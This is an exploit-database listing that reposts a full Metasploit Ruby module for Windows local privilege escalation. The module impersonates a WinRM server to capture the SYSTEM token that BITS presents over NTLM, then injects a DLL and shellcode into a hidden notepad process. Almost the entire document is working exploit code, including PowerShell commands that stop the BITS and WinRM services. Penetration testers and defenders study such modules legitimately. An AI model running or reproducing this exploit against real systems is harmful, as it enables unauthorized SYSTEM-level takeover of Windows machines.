[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NTLM BITS SYSTEM Token Impersonation Exploit

Author
Andrea Pierini
Risk
[
Security Risk High
]
0day-ID
0day-ID-35645
Category
local exploits
Date add
07-01-2021
Platform
windows
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/windows/reflective_dll_injection'

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection

  # Those are integer codes for representing the services involved in this exploit.
  BITS = 1
  WINRM = 2

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.',
          'Description' => %q{
            This module exploit BITS behavior which tries to connect to the
            local Windows Remote Management server (WinRM) every times it
            starts. The module launches a fake WinRM server which listen on
            port 5985 and triggers BITS. When BITS starts, it tries to
            authenticate to the Rogue WinRM server, which allows to steal a
            SYSTEM token. This token is then used to launch a new process
            as SYSTEM user. In the case of this exploit, notepad.exe is launched
            as SYSTEM. Then, it write shellcode in its previous memory space
            and trigger its execution. As this exploit uses reflective dll
            injection, it does not write any file on the disk. See
            /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md
            for complementary words of information.

            Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running.
            Lab experiments has shown that Windows 7 does not exhibit the vulnerable behavior.

            WARNING:

            - As this exploit runs a service on the target (Fake WinRM on port
            5985), a firewall popup may appear on target screen. Thus, this exploit
            may not be completely silent.

            - This exploit has been successfully tested on :
            Windows 10 (10.0 Build 19041) 32 bits
            Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits

            - This exploit failed because of no BITS authentication attempt on:
            Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits

            - Windows servers are not vulnerable because a genuine WinRM
            service is already running, except if the user has disabled it
            (Or if this exploit succeed to terminate it).

            - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are
            required.

            - BITS must not be running.

            - This exploit automatically perform above quoted checks.
            run "check" command to run checklist.
          },
          'License' => MSF_LICENSE,
          'Author' =>
        [
          'Cassandre', # Adapted decoder's POC for metasploit
          'Andrea Pierini (decoder)', # Lonely / Juicy Potato. Has written the POC
          'Antonio Cocomazzi (splinter_code)',
          'Roberto (0xea31)',
        ],
          'Arch' => [ARCH_X86, ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'DefaultOptions' =>
        {
          'EXITFUNC' => 'none',
          'WfsDelay' => '120'
        },
          'Targets' =>
        [
          ['Automatic', {}]
        ],
          'Notes' =>
        {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [SCREEN_EFFECTS],
          'Reliability' => [REPEATABLE_SESSION]
        },
          'Payload' =>
             {
               'DisableNops' => true,
               'BadChars' => "\x00"
             },
          'References' =>
        [
          ['URL', 'https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/'],
          ['URL', 'https://github.com/antonioCoco/RogueWinRM'],
        ],
          'DisclosureDate' => 'Dec 06 2019',
          'DefaultTarget' => 0
        }
      )
    )

    shutdown_service_option_description = [
      'Should this module attempt to shutdown BITS and WinRM services if they are running?',
      'Setting this parameter to true is useful only if SESSION is part of administrator group.',
      'In the common usecase (running as LOCAL SERVICE) you don\'t have enough privileges.'
    ].join(' ')

    winrm_port_option_description = [
      'Port the exploit will listen on for BITS connexion.',
      'As the principle of the exploit is to impersonate a genuine WinRM service,',
      'it should listen on WinRM port. This is in most case 5985 but in some configuration,',
      'it may be 47001.'
    ].join(' ')

    host_process_option_description = [
      'The process which will be launched as SYSTEM and execute metasploit shellcode.',
      'This process is launched without graphical interface so it is hidden.'
    ].join(' ')

    register_options(
      [
        OptBool.new('SHUTDOWN_SERVICES', [true, shutdown_service_option_description, false]),
        OptPort.new('WINRM_RPORT', [true, winrm_port_option_description, 5985]),
        OptString.new('HOST_PROCESS', [true, host_process_option_description, 'notepad.exe'])
      ]
    )
  end

  #
  # Function used to perform all mandatory checks in order to assess
  # if the target is vulnerable before running the exploit.
  # Basically, this function does the following:
  #   - Checks if current session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
  #   - Checks if operating system is neither Windows 7 nor Windows XP
  #   - Checks if BITS and WinRM are running, and attempt to terminate them if the user
  #     has specified the corresponding option
  #   - Checks if the session is not already SYSTEM
  def check
    privs = client.sys.config.getprivs
    os = client.sys.config.sysinfo['OS']

    # Fast fails
    if os.include?('Windows 7') || os.include?('Windows XP')
      print_bad("Operating system: #{os}")
      print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
      return Exploit::CheckCode::Safe
    end

    unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
      print_bad('Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.')
      return Exploit::CheckCode::Safe
    end
    vprint_good('Target session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.')

    running_services_code = check_bits_and_winrm
    if running_services_code < 0
      return Exploit::CheckCode::Safe
    end
    should_services_be_shutdown = datastore['SHUTDOWN_SERVICES']
    if running_services_code > 0
      if should_services_be_shutdown
        shutdown_service(running_services_code)
        sleep(2)
        running_services_code = check_bits_and_winrm
      end
      if [WINRM, WINRM + BITS].include?(running_services_code)
        print_bad('WinRM is running. Target is not exploitable.')
        return Exploit::CheckCode::Safe
      elsif running_services_code == BITS
        if should_services_be_shutdown
          print_warning('Failed to shutdown BITS.')
        end
        print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
      end
    end

    if is_system?
      print_bad('Session is already elevated.')
      return Exploit::CheckCode::Safe
    end

    vprint_good('Session is not (yet) System.')
    Exploit::CheckCode::Appears
  end

  #
  # This function is dedicated in checking if bits and WinRM are running.
  # It returns the running services. If both services are down, it returns 0.
  # If BITS is running, it returns 1 (Because BITS class constant = 1). If
  # WinRM is running, it returns 2. And if both are running, it returns
  # BITS + WINRM = 3.
  def check_bits_and_winrm
    check_command = 'powershell.exe Get-Service -Name BITS,WinRM'
    result = cmd_exec(check_command)
    vprint_status('Checking if BITS and WinRM are stopped...')

    if result.include?('~~')
      print_bad('Failed to retrieve infos about WinRM and BITS. Access is denied.')
      return -1
    end

    if result.include?('Stopped  BITS') && result.include?('Stopped  WinRM')
      print_good('BITS and WinRM are stopped.')
      return 0
    end

    if result.include?('Running  BITS') && result.include?('Stopped  WinRM')
      print_warning('BITS is currently running. It must be down for the exploit to succeed.')
      return BITS
    end

    if result.include?('Stopped  BITS') && result.include?('Running  WinRM')
      print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
      return WINRM
    end

    if result.include?('Running  BITS') && result.include?('Running  WinRM')
      print_warning('BITS and WinRM are currently running. They must be down for the exploit to succeed.')
      return BITS + WINRM
    end
  end

  #
  # Attempt to shutdown services through powershell.
  def shutdown_service(service_code)
    stop_command_map = {
      BITS => 'powershell.exe Stop-Service -Name BITS',
      WINRM => 'powershell.exe Stop-Service -Name WinRM',
      BITS + WINRM => 'powershell.exe Stop-Service -Name BITS,WinRM'
    }
    print_status('Attempting to shutdown service(s)...')
    cmd_exec(stop_command_map[service_code])
  end

  def exploit
    payload_name = datastore['PAYLOAD']
    payload_arch = framework.payloads.create(payload_name).arch
    winrm_port = datastore['WINRM_RPORT']
    host_process_name = datastore['HOST_PROCESS']

    if payload_arch.first == ARCH_X64
      dll_file_name = 'drunkpotato.x64.dll'
      vprint_status('Assigning payload drunkpotato.x64.dll')
    elsif payload_arch.first == ARCH_X86
      dll_file_name = 'drunkpotato.x86.dll'
      vprint_status('Assigning payload drunkpotato.x86.dll')
    else
      fail_with(Failure::BadConfig, 'Unknown target arch; unable to assign exploit code')
    end
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'drunkpotato', dll_file_name)
    library_path = ::File.expand_path(library_path)

    print_status('Launching notepad to host the exploit...')
    notepad_path = get_notepad_pathname(
      payload_arch.first,
      client.sys.config.getenv('windir'),
      client.arch
    )
    notepad_process = client.sys.process.execute(notepad_path, nil, { 'Hidden' => true })
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Reader Sandbox won't allow to create a new process:
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    formatted_payload = [
      winrm_port.to_s,
      host_process_name,
      payload.encoded.length.to_s,
      payload.encoded
    ].join("\x00")
    payload_mem = inject_into_process(process, formatted_payload)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end

end

#  0day.today [2024-11-15]  #